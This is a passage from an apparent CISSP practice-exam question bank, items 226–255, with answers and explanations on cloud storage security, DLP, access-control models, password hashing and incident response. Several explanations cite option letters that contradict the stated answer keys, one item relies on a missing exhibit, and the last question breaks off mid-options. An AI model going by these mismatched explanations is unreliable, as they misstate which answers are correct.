Certified Information Systems Security Professional CISSP (CISSP) — Questions 226300

529 questions total · 8pages · All types, answers revealed

Page 3

Page 4 of 8

Page 5
226
MCQhard

A financial services company has a hybrid cloud environment with on-premises servers and a public cloud provider. The security team recently discovered that an attacker exfiltrated sensitive customer data from a cloud storage bucket. The investigation reveals that the bucket was configured with a bucket policy that allowed anonymous read access. The security architect must redesign the architecture to prevent such incidents. The company uses AWS for cloud services. The architect proposes the following: (1) Enable AWS CloudTrail and Amazon GuardDuty for monitoring. (2) Implement AWS Identity and Access Management (IAM) roles for applications instead of long-term access keys. (3) Use AWS Key Management Service (KMS) to encrypt data at rest. (4) Configure a VPC with a NAT gateway and private subnets for all compute resources. (5) Implement S3 bucket policies that deny all access unless explicitly allowed by a specific IAM role. During a review, the chief information security officer (CISO) points out that one of these measures does not directly address the root cause of the incident. Which measure is least effective in preventing unauthorized access to S3 buckets?

A.Use AWS KMS to encrypt data at rest
B.Configure a VPC with private subnets and a NAT gateway
C.Enable AWS CloudTrail and Amazon GuardDuty for monitoring
D.Implement IAM roles for applications instead of long-term access keys
AnswerC

Monitoring detects but does not prevent misconfigurations.

Why this answer

Option C (enabling AWS CloudTrail and Amazon GuardDuty) is a detective control, not a preventive one. The root cause of the incident was a misconfigured bucket policy that allowed anonymous read access. Monitoring tools can detect unauthorized access after it occurs but cannot prevent it.

The other options directly address the root cause by enforcing least privilege, encrypting data, or restricting network access.

Exam trap

The trap here is confusing detective controls (monitoring) with preventive controls (access policies, encryption, network segmentation), leading candidates to think that enabling logging and threat detection directly prevents the root cause of a misconfigured bucket policy.

How to eliminate wrong answers

Option A is wrong because encrypting data at rest with AWS KMS does not prevent unauthorized access; it only protects data confidentiality if access is gained, but the root cause is a permissive bucket policy that allows anonymous read access. Option B is wrong because configuring a VPC with private subnets and a NAT gateway does not affect S3 bucket policies; S3 is a global service and bucket policies are evaluated independently of network architecture. Option D is wrong because implementing IAM roles instead of long-term access keys addresses credential management but does not prevent anonymous access granted by a bucket policy; the incident occurred because the bucket policy allowed anonymous read, not because of compromised keys.

227
MCQhard

An organization is adopting DevOps. Which of the following is a primary security concern when integrating security into CI/CD pipelines?

A.Credential management for automated tools.
B.Increased number of releases.
C.Automated testing slows down deployment.
D.Resistance from development teams.
AnswerA

Hardcoded or improperly stored credentials are a common attack vector.

Why this answer

Credential management is critical; secrets like API keys and passwords often leak in pipeline logs or repositories. Automated testing does not inherently slow deployment if properly designed. Increased release frequency can be managed.

Resistance is a cultural issue, not a technical security concern.

228
Multi-Selecthard

Which THREE of the following are valid considerations when implementing data loss prevention (DLP) controls to protect sensitive data? (Select three.)

Select 3 answers
A.Integration with all third-party applications
B.User training to reduce false positives and increase acceptance
C.Monitoring of data in use, in motion, and at rest
D.Data classification schemes to identify sensitive data
E.Blocking all data transfers to external devices
AnswersB, C, D

User training helps users understand why DLP blocks certain actions, reducing frustration.

Why this answer

Option B is correct because user training is a critical component of a successful DLP implementation. Without proper training, users may inadvertently trigger false positives by mishandling data or may attempt to bypass controls they perceive as overly restrictive. Training helps users understand classification labels and proper data handling procedures, reducing the operational burden on security teams and increasing overall acceptance of DLP policies.

Exam trap

The trap here is that candidates often assume DLP must be all-encompassing (e.g., blocking all transfers or integrating with every app), but the CISSP emphasizes risk-based, balanced controls that include user awareness and layered monitoring.

229
MCQeasy

A small business wants to implement a security policy that balances protection with usability. Which of the following is the MOST important factor when developing the policy?

A.Adopting a template from a similar organization to save time.
B.Aligning the policy with business objectives and risk appetite.
C.Ensuring the policy is enforceable with technical controls.
D.Basing the policy solely on regulatory compliance requirements.
AnswerB

Correct - Policy must support business needs and address real risks.

Why this answer

Option B is correct because a security policy must be aligned with the organization's business objectives and risk appetite to ensure it supports operations without imposing unnecessary restrictions. For a small business, this balance is critical—overly strict controls can hinder productivity, while weak controls increase risk. The policy should reflect the specific threats and tolerances of the business, not generic templates or compliance-only checklists.

Exam trap

The trap here is that candidates often confuse 'enforceability' (Option C) with policy effectiveness, but the CISSP emphasizes that policy must first be business-aligned; technical enforcement is a later step in the governance hierarchy.

How to eliminate wrong answers

Option A is wrong because adopting a template from a similar organization ignores the unique risk profile, business processes, and regulatory environment of the small business, leading to misaligned controls and potential gaps. Option C is wrong because enforceability with technical controls is a secondary consideration—the policy must first define what is acceptable; technical controls are implementation details that can be adjusted later. Option D is wrong because basing the policy solely on regulatory compliance requirements creates a minimum-security baseline that may not address the business's actual risk exposure or operational needs, leaving it vulnerable to non-compliance-related threats.

230
MCQmedium

A multinational corporation is expanding its operations into a new country with strict data protection laws. The company needs to ensure compliance while maintaining operational efficiency. Which of the following is the BEST approach to manage this risk?

A.Accept the risk of non-compliance as a cost of doing business and set aside a contingency fund for fines.
B.Assign legal counsel to review local laws and implement a one-time compliance checklist.
C.Create a uniform global privacy policy that satisfies all jurisdictions with minimal adjustments.
D.Adopt a privacy-by-design framework and conduct a Data Protection Impact Assessment (DPIA) before launching operations.
AnswerD

Correct - Privacy-by-design and DPIA ensure compliance is built into processes.

Why this answer

Option D is correct because a privacy-by-design framework ensures data protection is embedded into systems and processes from the outset, while a Data Protection Impact Assessment (DPIA) systematically identifies and mitigates privacy risks specific to the new jurisdiction. This proactive, risk-based approach aligns with regulatory requirements like the GDPR and demonstrates due diligence, reducing the likelihood of non-compliance and operational disruption.

Exam trap

The trap here is that candidates often choose Option B (one-time compliance checklist) because it seems practical and legally focused, but they overlook that privacy compliance is an ongoing process requiring continuous risk assessment and adaptation, not a single review event.

How to eliminate wrong answers

Option A is wrong because accepting non-compliance risk as a cost of doing business ignores legal obligations and can lead to severe penalties, reputational damage, and operational bans, which is not a viable risk management strategy under strict data protection laws. Option B is wrong because a one-time compliance checklist is static and fails to address ongoing regulatory changes, data lifecycle management, and the need for continuous monitoring and adaptation required by modern privacy frameworks. Option C is wrong because a uniform global privacy policy cannot satisfy all jurisdictions due to conflicting requirements (e.g., GDPR’s strict consent vs. other laws’ legitimate interest provisions), and minimal adjustments often result in gaps that violate local laws.

231
Multi-Selecthard

Which TWO of the following are valid data de-identification techniques?

Select 2 answers
A.Encryption
B.Access control
C.Data masking
D.Backup
E.Tokenization
AnswersC, E

Masking obscures sensitive data, often permanently.

Why this answer

Data masking is a valid de-identification technique because it irreversibly obscures specific data values, such as replacing real credit card numbers with fictional ones, while preserving the data format for testing or analytics. Unlike encryption, masking does not allow reversal to the original value, ensuring the data is no longer personally identifiable. It is commonly used in non-production environments to protect sensitive information.

Exam trap

The trap here is that candidates often confuse encryption with de-identification, but encryption is reversible and does not permanently remove the link to the individual, whereas de-identification techniques like masking and tokenization are designed to be irreversible or non-reversible in the context of the original data.

232
Multi-Selecthard

Which THREE of the following are commonly used metrics for measuring the effectiveness of a vulnerability management program?

Select 3 answers
A.Patch coverage percentage
B.Mean time to detect (MTTD)
C.Mean time to remediate (MTTR)
D.Number of vulnerabilities per scan
E.Number of security incidents
AnswersA, C, D

Coverage measures the extent of systems patched.

Why this answer

Patch coverage percentage is a direct measure of vulnerability management effectiveness because it tracks the proportion of systems that have received required patches. A high patch coverage percentage indicates that the organization is successfully applying fixes to known vulnerabilities, reducing the attack surface. This metric is commonly used in vulnerability management programs to assess the completeness of remediation efforts.

Exam trap

The trap here is that candidates confuse Mean Time to Detect (MTTD) and Mean Time to Remediate (MTTR) as both being relevant to vulnerability management, but MTTD is specific to incident response, not to the proactive patching and remediation cycle measured by MTTR and patch coverage.

233
MCQeasy

A network administrator notices that users in the accounting department can access the internet but are unable to access the internal payroll server (10.10.10.50). The firewall rule allows traffic from the accounting subnet (10.10.20.0/24) to the payroll server. What is the most likely issue?

A.DNS is not resolving the payroll server's IP address.
B.The payroll server's default gateway does not have a route back to 10.10.20.0/24.
C.The firewall rule is applied to the outbound interface only.
D.The accounting subnet is blocked by an implicit deny rule.
AnswerB

Without a return route, packets from the server cannot reach the accounting subnet.

Why this answer

The most likely issue is that the payroll server's default gateway does not have a route back to the accounting subnet (10.10.20.0/24). Even if the firewall permits outbound traffic from the accounting subnet to the payroll server, the return traffic from the server must be routed back through the firewall or a router that knows how to reach 10.10.20.0/24. Without a return route, the server's response packets are dropped, causing a one-way communication failure.

Exam trap

The trap here is that candidates often focus on firewall rule direction (inbound vs. outbound) or DNS, overlooking the fundamental requirement for symmetric routing and the fact that the server's default gateway must know how to reach the source subnet.

How to eliminate wrong answers

Option A is wrong because DNS resolution is irrelevant when the user is accessing the payroll server by its IP address (10.10.10.50), not a hostname. Option C is wrong because firewall rules are typically applied to inbound and outbound interfaces; if the rule is applied only to the outbound interface, it would still allow traffic leaving the accounting subnet, but the real issue is the lack of a return route, not the firewall rule placement. Option D is wrong because an implicit deny rule would block all traffic not explicitly permitted, but the question states the firewall rule allows traffic from the accounting subnet to the payroll server, so the implicit deny is not the cause of the specific failure.

234
MCQmedium

A government agency requires a new secure document management system that enforces mandatory access control with the properties that users cannot read documents at a higher classification and cannot write documents to a lower classification (to prevent data leaking). The system must also support different categories (compartments) within the same classification level, and a user with access to one compartment should not be able to access another compartment unless explicitly allowed. The architect is considering the Bell-LaPadula model. However, the Bell-LaPadula model's *-property (no write-down) addresses the write issue, but there is also a need to handle compartment isolation. Which additional model or mechanism should be incorporated to ensure compartment isolation?

A.Apply the Brewer-Nash (Chinese Wall) model which enforces conflict of interest by preventing access to multiple compartments that conflict.
B.Implement Biba's integrity model which prevents write-up, thus complementing Bell-LaPadula.
C.Use a lattice-based access control (LBAC) that extends Bell-LaPadula by defining a security lattice that includes compartments and categories, ensuring that a subject's clearance must dominate the object's classification, including compartments.
D.Use role-based access control (RBAC) to define compartments.
AnswerC

LBAC naturally handles multiple compartments within a classification level.

Why this answer

Option C is correct because lattice-based access control (LBAC) extends the Bell-LaPadula model by defining a security lattice that includes both hierarchical classifications (e.g., Top Secret, Secret) and non-hierarchical categories (compartments). In this lattice, a subject's clearance must dominate an object's classification across both dimensions, ensuring that a user with access to one compartment cannot access another unless their clearance includes that specific category. This directly enforces the required compartment isolation while maintaining the *-property (no write-down) for data leakage prevention.

Exam trap

The trap here is that candidates may confuse the Brewer-Nash model's dynamic separation of duties with the static, lattice-based compartment isolation required by MAC, or incorrectly assume that Biba's integrity model can somehow enforce confidentiality-based compartment boundaries.

How to eliminate wrong answers

Option A is wrong because the Brewer-Nash (Chinese Wall) model is designed to prevent conflict of interest in commercial environments by dynamically restricting access to competing datasets, not to enforce static compartment isolation within a single classification level as required by the government agency. Option B is wrong because Biba's integrity model focuses on preventing unauthorized modification (no write-up, no read-down) to protect data integrity, which does not address compartment isolation or complement Bell-LaPadula's confidentiality goals in this context. Option D is wrong because role-based access control (RBAC) assigns permissions based on job functions, not on a formal lattice of classifications and categories, and it lacks the mandatory, system-enforced dominance checks needed for compartment isolation in a mandatory access control (MAC) system.

235
Multi-Selectmedium

Which TWO of the following are mandatory secure coding practices to prevent injection attacks? (Select exactly two.)

Select 2 answers
A.Encode output to the browser
B.Encrypt sensitive input data
C.Use custom error messages that detail the failure
D.Use parameterized queries or prepared statements
E.Validate and sanitize all user input
AnswersD, E

Separates SQL logic from data, preventing injection.

Why this answer

Options A and D are correct. Input validation ensures data conforms to expected patterns; parameterized queries separate code from data. Option B is wrong because encoding outputs is for XSS, not injection.

Option C is wrong because error messages should not reveal internal details. Option E is wrong because encryption does not prevent injection.

236
Multi-Selectmedium

A security manager is selecting controls to protect sensitive data. Which TWO are examples of administrative controls?

Select 2 answers
A.Security awareness training
B.Firewalls
C.Access control lists
D.Background checks
E.Encryption
AnswersA, D

Administrative control.

Why this answer

Administrative controls are policies, procedures, and training. Security awareness training (B) and background checks (D) are administrative. Firewalls (A) and encryption (C) are technical.

Access control lists (E) are technical.

237
MCQhard

A company is decommissioning a data center and needs to dispose of hard drives that contained highly confidential financial data. Which of the following methods provides the HIGHEST assurance that data cannot be recovered?

A.Overwriting the drives with multiple passes of random data
B.Shredding the drives into small pieces
C.Degaussing the drives
D.Overwriting the drives with a single pass of zeros
AnswerB

Physical destruction makes data recovery physically impossible.

Why this answer

Shredding the drives into small pieces physically destroys the platters, making data recovery impossible regardless of the storage technology (e.g., HDD vs. SSD). This method provides the highest assurance because it eliminates any possibility of reading residual magnetic or solid-state data, even with advanced forensic tools like electron microscopy.

Exam trap

The trap here is that candidates often choose degaussing or multi-pass overwriting because they are familiar with these methods, but they fail to recognize that physical destruction is the only method that guarantees data irretrievability across all drive types, especially SSDs.

How to eliminate wrong answers

Option A is wrong because overwriting with multiple passes (e.g., Gutmann method) is effective for magnetic media but provides no assurance for SSDs or modern HDDs with high-density platters, and it is time-consuming; more importantly, it does not physically destroy the drive, so residual data could theoretically be recovered with specialized equipment. Option C is wrong because degaussing uses a strong magnetic field to erase data on HDDs, but it is ineffective on SSDs (which store data in NAND flash cells) and may leave the drive non-functional without guaranteeing complete erasure of all sectors. Option D is wrong because a single pass of zeros is sufficient for many modern HDDs (per NIST SP 800-88), but it does not address SSDs or provide the same level of assurance as physical destruction, and it leaves the drive intact for potential recovery attempts.

238
MCQmedium

An organization needs to ensure that its employees understand their responsibilities regarding information security. Which of the following is the MOST effective way to achieve this?

A.Distribute a security policy document and require a signature.
B.Conduct a one-time annual security briefing.
C.Display security posters in common areas.
D.Implement a security awareness program with regular training and assessments.
AnswerD

Correct - ongoing training reinforces knowledge and measures effectiveness.

Why this answer

A security awareness program with regular training and assessments is the most effective way to ensure employees understand their responsibilities because it establishes a continuous learning cycle. Unlike one-time events, it reinforces secure behaviors through repetition, real-world scenarios, and measurable assessments, aligning with the NIST SP 800-50 framework for building a security-conscious culture.

Exam trap

The trap here is that candidates often mistake a one-time annual briefing (Option B) as sufficient due to its common use in compliance checklists, but the CISSP emphasizes continuous, behavior-changing programs over periodic, passive activities.

How to eliminate wrong answers

Option A is wrong because simply distributing a policy document and requiring a signature does not guarantee comprehension or retention; it relies on passive acknowledgment and lacks verification of understanding, which is a common failure point in compliance-driven approaches. Option B is wrong because a one-time annual briefing is insufficient to address evolving threats and employee turnover; it provides only a snapshot of knowledge without ongoing reinforcement, leading to decay of awareness over time. Option C is wrong because security posters in common areas are passive communication tools that lack interactivity and assessment; they may raise superficial awareness but fail to change behavior or ensure employees grasp their specific responsibilities.

239
Multi-Selecteasy

An organization is planning a penetration test of its internal network. Which TWO of the following are essential elements to include in the test scope and rules of engagement?

Select 2 answers
A.List of specific exploitation tools to be used.
B.Time windows when testing is permitted (e.g., after business hours).
C.Schedule for automated vulnerability scanning of all external systems.
D.List of IP addresses and systems authorized for testing.
E.Detailed plan for exploiting client-side vulnerabilities.
AnswersB, D

Essential to avoid disruption.

Why this answer

Options A and D are correct because the rules of engagement must clearly define authorized targets and testing windows to avoid business disruption and legal issues. Option B is wrong because client-side attacks are not typically part of a network penetration test. Option C is wrong because vulnerability scanning is a different activity.

Option E is wrong because the specific tools to be used are not necessarily required in the scope, though they may be agreed upon.

240
MCQeasy

Which of the following is the PRIMARY purpose of a business impact analysis (BIA) in business continuity planning?

A.Identify critical business functions and dependencies
B.Develop and test the continuity plan
C.Determine recovery time objectives (RTO) and recovery point objectives (RPO)
D.Create the business continuity plan document
AnswerA

BIA focuses on impact and prioritization.

Why this answer

The primary purpose of a business impact analysis (BIA) is to identify critical business functions and their dependencies on resources such as personnel, systems, data, and third-party services. This identification drives all subsequent continuity planning by quantifying the impact of disruptions and establishing the basis for recovery strategies. Without a BIA, recovery objectives and plans would be based on assumptions rather than empirical data about operational priorities.

Exam trap

The trap here is that candidates confuse the BIA's primary purpose with its outputs (RTO/RPO), but the BIA is fundamentally about identifying what is critical and why, not setting the numerical targets themselves.

How to eliminate wrong answers

Option B is wrong because developing and testing the continuity plan occurs after the BIA, using its outputs to design and validate recovery procedures; the BIA itself does not involve plan creation or testing. Option C is wrong because while RTO and RPO are derived from BIA findings, they are not the primary purpose—the BIA first identifies critical functions and dependencies, and then those metrics are calculated as part of the recovery strategy phase. Option D is wrong because creating the business continuity plan document is a separate step that synthesizes BIA results, recovery strategies, and procedures into a formal document; the BIA is an analytical input, not the document itself.

241
MCQhard

Refer to the exhibit. Which of the following statements is correct regarding the connections and access-list?

A.The access-list 'outside_in' is applied to the outside interface and is allowing the connections.
B.The UDP connection to 198.51.100.2:53 is being allowed by line 2 of the access-list.
C.The access-list 'outside_in' is not applied to any interface or is not the primary access-list governing inbound traffic.
D.The TCP connection to 203.0.113.5:443 is being denied by the implicit deny rule.
AnswerC

Correct. The connections exist but the access-list has 0 hits, implying either it is not applied or another rule is allowing traffic (e.g., an implicit permit for established connections).

Why this answer

The access-list 'outside_in' is applied to the outside interface for inbound traffic. However, the hit counts are all 0, meaning the access-list is not being hit. This suggests that the access-list is not applied to the interface, or the interface has another access-list that allows the traffic, or the connections are established through other means (like stateful inspection).

The connections are active, so traffic is passing through the ASA. The access-list with 0 hits indicates it is not the mechanism allowing the traffic.

242
MCQmedium

A security administrator is configuring role-based access control (RBAC) for a cloud storage system. Which of the following is the best practice for assigning permissions?

A.Use access control lists on each object
B.Implement mandatory access control
C.Create roles based on job functions and assign users to roles
D.Assign permissions directly to users for flexibility
AnswerC

This is the core of RBAC.

Why this answer

Option C is correct because RBAC assigns permissions to roles, then users are assigned to roles, ensuring scalability and manageability. Option A is wrong because direct permissions are difficult to manage. Option B is wrong after all, user-based permissions are not RBAC.

Option D is wrong because MAC is a different model. Option E is wrong because ABAC is attribute-based, not RBAC.

243
MCQmedium

An organization is implementing a bring-your-own-device (BYOD) policy. The security architect must ensure that corporate data on the device is protected from unauthorized access if the device is lost or stolen, while minimizing impact on user privacy. Which solution is most appropriate?

A.Use mobile device management (MDM) to create a secure container for corporate apps and data
B.Require employees to use company-issued devices only
C.Disable camera and microphone on the device
D.Full device encryption with remote wipe capability
AnswerA

Containerization isolates corporate data and allows selective wipe.

Why this answer

A secure container (often implemented via MDM with app wrapping or per-app VPN) creates an encrypted, isolated partition on the device for corporate apps and data. This ensures that if the device is lost or stolen, the corporate data remains encrypted and inaccessible without the container's authentication, while personal apps and data outside the container remain untouched, thus minimizing privacy impact.

Exam trap

The trap here is that candidates often choose full device encryption with remote wipe (Option D) because it sounds strong, but they overlook the privacy impact of wiping personal data, which the question explicitly states must be minimized.

How to eliminate wrong answers

Option B is wrong because requiring company-issued devices only eliminates BYOD entirely, failing to meet the policy's goal of allowing personal devices while protecting corporate data. Option C is wrong because disabling camera and microphone does not protect corporate data from unauthorized access on a lost or stolen device; it addresses data exfiltration via sensors, not storage security. Option D is wrong because full device encryption with remote wipe protects all data but wipes personal data too, violating the requirement to minimize impact on user privacy; it also lacks granularity for selective corporate data protection.

244
MCQeasy

A large financial institution is finalizing its annual risk treatment plan based on a recent enterprise risk assessment. The risk appetite statement approved by the board specifies that the organization will accept only low residual risks for financial loss, but is willing to accept moderate risks for reputational damage if cost-benefit justifies. The risk register includes the following findings: 1) A critical SQL injection vulnerability in the online banking portal with high likelihood and critical impact; current controls include a web application firewall (WAF) that is not fully tuned. 2) Use of outdated TLS 1.0 encryption on internal communications between data centers; likelihood is medium, impact is low. 3) Lack of background checks for third-party vendors with access to sensitive data; likelihood is low, impact is moderate. 4) A single point of failure in the primary data center's power supply; likelihood is low, impact is critical. 5) An incident response plan that has not been tested in two years; likelihood is medium, impact is moderate. The CISO must prioritize actions for the upcoming quarter. What is the most appropriate first step?

A.Transfer the single point of failure risk by purchasing business interruption insurance.
B.Immediately remediate the SQL injection vulnerability by tuning the WAF and applying vendor patches.
C.Outsource incident response to a managed security service provider (MSSP) to compensate for the untested plan.
D.Accept the risk of outdated TLS 1.0 encryption because impact is low.
AnswerB

This addresses the highest risk with critical impact and likelihood, aligning with risk appetite.

Why this answer

Option A is correct. The SQL injection vulnerability has high likelihood and critical impact, resulting in high risk that exceeds the risk appetite for financial loss. Immediate patching or other remediation is necessary to bring the risk to an acceptable level.

Option B (accept outdated encryption) is possible but not the highest priority. Option C (transfer single point of failure) is valid but power supply risk is low likelihood; insurance may not be the first step. Option D (outsource incident response) is not the most urgent; testing the plan is less critical than addressing a high-risk vulnerability.

245
Multi-Selectmedium

A company is implementing a digital signature system to ensure non-repudiation. The security architect must select a hash function that meets the required security properties. Which THREE of the following are necessary properties for the hash function?

Select 3 answers
A.Preimage resistance
B.Reversibility
C.Collision resistance
D.Second preimage resistance
E.Determinism
AnswersA, C, D

Correct: Preimage resistance ensures that given a hash, it is computationally infeasible to find any input that produces that hash.

Why this answer

A hash function must be preimage resistant (unable to invert), second preimage resistant (cannot find another input with the same hash), and collision resistant (cannot find two inputs with the same hash). Reversibility is not a property of hash functions—they are one-way. Determinism is inherent to all hash functions but is not a security property.

246
MCQeasy

A small business owner stores customer payment card information (PCI) in a legacy database that is not compliant with PCI DSS. The business is migrating to a new cloud-based point-of-sale (POS) system that uses tokenization. The owner wants to ensure that the legacy data is handled securely during the transition. Which of the following is the BEST approach?

A.Migrate the legacy data into the new POS system and have the tokenization service replace it
B.Encrypt the legacy database using AES-256 and store the encryption key on a separate server
C.Archive the legacy database to a tape backup and store it in a secure offsite vault
D.Tokenize the payment data in the legacy database, then securely purge the original cardholder data and verify the purge
AnswerD

Tokenization replaces sensitive data with a token, and purging eliminates the original data, reducing PCI scope.

Why this answer

Option C is correct because purging the legacy data after tokenization and confirming no residual sensitive data remains ensures that card data is no longer stored, reducing risk. Option A is wrong because storing legacy data encrypted increases risk of key compromise. Option B is wrong because archiving encrypted data still retains the data.

Option D is wrong because merging may complicate tokenization and risk.

247
Multi-Selecteasy

Which THREE of the following are key activities in the recovery phase of incident response?

Select 3 answers
A.Identifying the root cause
B.Notifying law enforcement
C.Restoring systems from backups
D.Conducting post-incident review
E.Implementing containment measures
AnswersB, C, D

May be required depending on the incident.

Why this answer

Notifying law enforcement is a key activity in the recovery phase because it involves external coordination after the immediate threat is contained, ensuring legal and regulatory compliance. Recovery focuses on restoring normal operations and preserving evidence for potential prosecution, which includes contacting authorities if the incident involves criminal activity. This step is distinct from containment or eradication, as it occurs after systems are stabilized and the organization begins returning to business as usual.

Exam trap

The trap here is confusing the recovery phase with the eradication or containment phases, leading candidates to select root cause analysis (eradication) or containment measures (containment) as recovery activities, when recovery strictly involves restoring operations and post-incident documentation.

248
MCQhard

A security team is evaluating a new endpoint detection and response (EDR) solution. Which of the following capabilities is MOST important for detecting fileless malware?

A.Static malware analysis.
B.Signature-based detection.
C.Behavioral analysis and process monitoring.
D.Network traffic inspection.
AnswerC

Detects runtime behaviors like PowerShell abuse or process injection.

Why this answer

Option B is correct because behavioral analysis and process monitoring detect anomalous behavior typical of fileless malware. Signature-based detection is ineffective against fileless variants.

249
MCQhard

An organization uses a custom application that stores user passwords using salted SHA-256 hashes. During a security audit, the auditor recommends migrating to a more secure password storage mechanism. Which of the following is the best recommendation?

A.Use plaintext with database encryption
B.Use AES-256 encryption for passwords
C.Use bcrypt with a cost factor of 12
D.Use MD5 with a salt
E.Use PBKDF2 with 10,000 iterations
AnswerC

bcrypt is designed for password hashing with a work factor that resists brute-force.

Why this answer

bcrypt is a deliberately slow, adaptive password hashing function that includes a built-in salt and a configurable cost factor. A cost factor of 12 makes each hash computation computationally expensive, effectively thwarting brute-force and GPU-based attacks. Unlike SHA-256, which is designed for speed and can be cracked rapidly with modern hardware, bcrypt's design inherently resists parallelization and ASIC/GPU acceleration.

Exam trap

The trap here is that candidates often confuse 'encryption' (reversible) with 'hashing' (one-way) and mistakenly choose AES-256 or database encryption, failing to recognize that password storage must use a slow, salted, one-way hashing algorithm specifically designed for credential protection.

How to eliminate wrong answers

Option A is wrong because storing passwords in plaintext, even with database encryption, exposes them to any attacker who gains access to the decryption key or the running application, violating the fundamental principle of never storing passwords in recoverable form. Option B is wrong because AES-256 encryption is reversible; if the encryption key is compromised, all passwords are instantly exposed, and encryption does not protect against insider threats or application-level breaches. Option D is wrong because MD5 is cryptographically broken and vulnerable to collision attacks, and even with a salt, it is far too fast to compute, allowing attackers to crack hashes at billions per second.

Option E is wrong because while PBKDF2 is a reasonable key derivation function, 10,000 iterations is considered a weak and outdated iteration count; modern recommendations (e.g., NIST SP 800-63B) suggest at least 310,000 iterations for SHA-256, and PBKDF2 is less resistant to GPU/ASIC attacks than bcrypt or Argon2.

250
Multi-Selecteasy

Which TWO are essential components of a security policy framework?

Select 2 answers
A.Specific encryption key lengths
B.Incident response flowcharts
C.Network topology diagrams
D.Roles and responsibilities
E.Statement of scope
AnswersD, E

Policies must assign responsibility for security.

Why this answer

A security policy framework includes high-level policies that define scope, responsibilities, and governance. Standards and procedures operationalize policies, but the core policy document includes scope and roles.

251
MCQhard

A government agency's data retention policy requires that classified documents be destroyed after 10 years. Which method ensures both the information and the media are completely destroyed in a way that is verifiable and auditable?

A.Incineration in a certified facility
B.Overwriting the data seven times
C.Degaussing the storage media
D.Deleting all files and emptying the recycle bin
AnswerA

Incineration destroys both data and media, and provides audit trail via destruction certificates.

Why this answer

Incineration in a certified facility is the only option that completely destroys both the information and the physical media, leaving no residue that could be reconstructed. For classified government documents, the destruction must be verifiable and auditable, which a certified incineration facility provides through documented chain-of-custody and destruction certificates. This method ensures the media is physically reduced to ash, eliminating any possibility of data recovery, unlike logical or magnetic techniques.

Exam trap

The trap here is that candidates often confuse 'sanitization' with 'destruction' — they may choose degaussing or overwriting because those methods effectively erase data, but the question explicitly requires complete destruction of both information and media, which only physical destruction methods like incineration achieve.

How to eliminate wrong answers

Option B is wrong because overwriting data seven times (e.g., using the Gutmann method) only addresses logical data on functional media; it does not destroy the physical media itself, and for classified documents, the media must be physically destroyed to prevent reconstruction from residual magnetic patterns or platter remnants. Option C is wrong because degaussing destroys the magnetic field on storage media, rendering data unreadable, but it does not destroy the media itself; degaussed drives can still be physically intact and potentially leak information through physical inspection or advanced forensic techniques, and it is not verifiable for all media types (e.g., SSDs). Option D is wrong because deleting files and emptying the recycle bin only removes file system pointers, leaving the actual data intact on the media until overwritten; this is completely insufficient for classified destruction and provides no verifiable or auditable proof of destruction.

252
MCQhard

A multinational corporation is establishing a security governance framework. The board of directors wants to ensure that information security strategy aligns with business objectives. Which role is primarily responsible for integrating security into the organization's strategic decision-making?

A.IT security team
B.Internal audit team
C.Senior management
D.Data owner
AnswerC

Senior management sets strategic direction and ensures security aligns with business objectives.

Why this answer

Senior management (C) is primarily responsible for integrating security into strategic decision-making because they hold the authority to allocate resources, define risk appetite, and ensure that security initiatives directly support business objectives. In a governance framework, only senior management can bridge the gap between operational security and enterprise strategy, as they are accountable for the organization's overall risk posture and compliance mandates.

Exam trap

The trap here is that candidates often confuse operational responsibility (IT security team) with strategic accountability (senior management), leading them to select the IT security team because they are the ones executing security tasks, but the CISSP emphasizes that governance and strategic alignment are board-level duties.

How to eliminate wrong answers

Option A is wrong because the IT security team is responsible for implementing and operationalizing security controls, not for setting strategic direction or aligning security with business goals. Option B is wrong because the internal audit team provides independent assurance and evaluates control effectiveness, but they do not own or drive strategic integration of security. Option D is wrong because the data owner is accountable for classifying and protecting specific data assets, not for enterprise-wide strategic alignment of security with business objectives.

253
MCQmedium

A company is implementing a secure software development lifecycle (SSDLC). Which of the following is a key activity during the design phase?

A.Static code analysis
B.Code signing
C.Threat modeling
D.Penetration testing
AnswerC

Correct. Threat modeling identifies threats and vulnerabilities early in the design phase.

Why this answer

Threat modeling is a key activity during the design phase of the SSDLC because it proactively identifies potential security threats, vulnerabilities, and attack vectors before any code is written. By analyzing the system's architecture, data flows, and trust boundaries (e.g., using STRIDE or PASTA methodologies), teams can design security controls directly into the system, reducing the cost and impact of fixes later. This aligns with the NIST SP 800-64 and Microsoft SDL frameworks, which mandate threat modeling as a core design-phase activity.

Exam trap

The trap here is that candidates confuse 'design phase' with 'implementation phase' activities, mistakenly selecting static code analysis (A) because it is a common security review, but it requires code to exist, whereas threat modeling is the only design-phase option that addresses architecture before code is written.

How to eliminate wrong answers

Option A is wrong because static code analysis is a source code review technique performed during the implementation phase, not the design phase, as it requires code to be written to scan for syntax errors and security flaws. Option B is wrong because code signing is a deployment-phase activity that uses digital signatures (e.g., Authenticode) to verify the integrity and origin of compiled binaries, not a design-phase task. Option D is wrong because penetration testing is a validation activity performed during the testing or operations phase, where live systems are attacked to find vulnerabilities, not during design.

254
MCQmedium

Which of the following describes the concept of 'least privilege' in the context of access control?

A.Users are granted only the permissions necessary to perform their job functions
B.Access is granted on a need-to-know basis but with maximum permissions
C.Access is based on roles and seniority
D.Users have access to all resources unless explicitly denied
AnswerA

Correct. Least privilege limits access to the minimum required.

Why this answer

Least privilege is a fundamental access control principle that mandates users be granted only the permissions necessary to perform their specific job functions. This minimizes the attack surface by reducing unnecessary access to sensitive resources, limiting potential damage from accidental or malicious actions. In practice, this is enforced through mechanisms like discretionary access control (DAC) or role-based access control (RBAC) with granular permission sets, ensuring no user has more rights than required.

Exam trap

The trap here is that candidates often confuse 'least privilege' with 'need-to-know' (which focuses on data confidentiality rather than permission granularity) or assume that role-based access inherently enforces least privilege, ignoring that roles can be overly broad.

How to eliminate wrong answers

Option B is wrong because it contradicts least privilege by granting 'maximum permissions' on a need-to-know basis, which would over-provision access and increase risk. Option C is wrong because it conflates least privilege with role-based access control (RBAC) and seniority, which may assign excessive permissions based on role hierarchy rather than actual job necessity. Option D is wrong because it describes a default-allow or 'open' access model, which is the opposite of least privilege; least privilege requires explicit permission grants, not implicit access to all resources.

255
MCQhard

A financial institution mandates that all administrative access to network devices must go through a privileged access management (PAM) solution. The PAM solution manages and rotates credentials automatically and logs all sessions. Recently, an auditor discovered that a router's configuration was changed outside of the approved change window. PAM logs show no session during that time. The router supports both local and RADIUS authentication. Which of the following is the MOST likely explanation for the unauthorized change?

A.A local account on the router was used that is not managed by the PAM solution.
B.The PAM solution's database was corrupted and failed to log the session.
C.The router's RADIUS configuration pointed to a different, unmonitored authentication server.
